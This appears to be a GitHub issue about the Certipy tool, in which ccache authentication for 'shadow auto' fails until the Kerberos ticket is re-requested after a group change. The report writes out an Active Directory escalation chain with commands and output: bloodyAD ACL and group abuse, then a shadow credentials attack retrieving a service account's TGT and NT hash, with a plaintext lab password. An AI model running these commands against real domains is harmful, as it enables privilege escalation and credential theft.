`shadow auto` ccache parsing

[audibleblink]

❯❯ klist                                                                                                                                    1
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: low.user@example.tld

  Issued                Expires               Principal
Nov 17 22:12:44 2024  Nov 18 08:12:44 2024  krbtgt/example.tld@example.tld
Nov 17 22:13:01 2024  Nov 18 08:12:44 2024  host/dc01.example.tld@example.tld
Nov 17 22:13:04 2024  Nov 18 08:12:44 2024  ldap/dc01.example.tld@example.tld

❯❯ echo $KRB5CCNAME
/tmp/krb5cc_1000

• different tool, but you can see that the ccache is valid

  
  bloodyAD -k --host example.tld set owner Management low.user
  bloodyAD -k --host example.tld add genericAll Management low.user
  bloodyAD -k --host example.tld add groupMember Management low.user

[!] S-1-5-21-729746778-2675978091-3820388244-1103 is already the owner, no modification will be made [+] low.user has now GenericAll on Management [+] low.user added to Management

- here we see an error when attempting to use that ticket with `shadow auto`

❯❯ certipy shadow auto -k -target dc01.example.tld -account management_svc Certipy v4.8.2 - by Oliver Lyak (ly4k)

[] Targeting user 'management_svc' [] Generating certificate [] Certificate generated [] Generating Key Credential [] Key Credential generated with DeviceID '92f42577-e273-7365-4a6e-c51ddf289e05' [] Adding Key Credential with device ID '92f42577-e273-7365-4a6e-c51ddf289e05' to the Key Credentials for 'management_svc' [-] Could not update Key Credentials for 'management_svc' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

- same command, but with manual auth. this time it works

❯❯ certipy shadow auto -u low.user@example.tld -p judith09 -target dc01.example.tld -account management_svc Certipy v4.8.2 - by Oliver Lyak (ly4k)

[] Targeting user 'management_svc' [] Generating certificate [] Certificate generated [] Generating Key Credential [] Key Credential generated with DeviceID '43bfd24f-06e5-7eef-7024-7b9347c4390e' [] Adding Key Credential with device ID '43bfd24f-06e5-7eef-7024-7b9347c4390e' to the Key Credentials for 'management_svc' [] Successfully added Key Credential with device ID '43bfd24f-06e5-7eef-7024-7b9347c4390e' to the Key Credentials for 'management_svc' [] Authenticating as 'management_svc' with the certificate [] Using principal: management_svc@example.tld [] Trying to get TGT... [] Got TGT [] Saved credential cache to 'management_svc.ccache' [] Trying to retrieve NT hash for 'management_svc' [] Restoring the old Key Credentials for 'management_svc' [] Successfully restored the old Key Credentials for 'management_svc' [] NT hash for 'management_svc': xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

- worth noting that `certipy` can successfully use other functions (`list`) with the same ccache

❯❯ certipy shadow list -k -target dc01 -account management_svc Certipy v4.8.2 - by Oliver Lyak (ly4k)

[] Targeting user 'management_svc' [] Listing Key Credentials for 'management_svc' [*] DeviceID: 088eafc6-ffeb-3f7d-f0c4-77b4c7d3589a | Creation Time (UTC): 2024-11-16 06:05:47.109503

[audibleblink]

works after re-requesting the ccache after the group membership change, which after further review makes sense. skill issue. closing.